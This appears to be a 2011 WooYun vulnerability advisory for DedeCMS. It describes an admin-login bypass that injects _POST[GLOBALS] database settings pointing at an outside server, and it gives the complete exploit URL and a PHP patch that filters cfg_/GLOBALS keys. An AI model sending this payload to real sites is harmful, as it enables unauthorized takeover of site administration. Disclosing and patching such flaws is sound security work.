漏洞概要 关注数(5) 关注此漏洞
缺陷编号: WooYun-2011-02663
漏洞标题: DEDECMS爆严重安全漏洞
相关厂商: Dedecms
漏洞作者: effort5
提交时间: 2011-08-11 14:58
公开时间: 2011-08-16 15:00
漏洞类型: 设计缺陷/逻辑错误
危害等级: 高
自评Rank: 10
漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: 第三方不可信程序 php源码审核 php源码分析 dedecms 白盒测试
漏洞详情
披露状态:
2011-08-11: 细节已通知厂商并且等待厂商处理中
2011-08-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”
详细说明:
http://**.**.**.**/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=**.**.**.**&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面黑底黄字上的字母改为当前的验证码,即可直接进入网站后台。
漏洞证明:
修复方案:
此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法:
解决办法:
找到include/common.inc.php文件,把
foreach($_REQUEST as $_k=>$_v)
{
var_dump($_k);
if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
{
exit('Request var not allow!');
}
}
换成
//检查和注册外部提交的变量
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k=>$_v) {
CheckRequest($_k);
CheckRequest($val[$_k]);
}
} else
{
if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
{
exit('Request var not allow!');
}
}
}
CheckRequest($_REQUEST);
版权声明:转载请注明来源 effort5@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:10 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值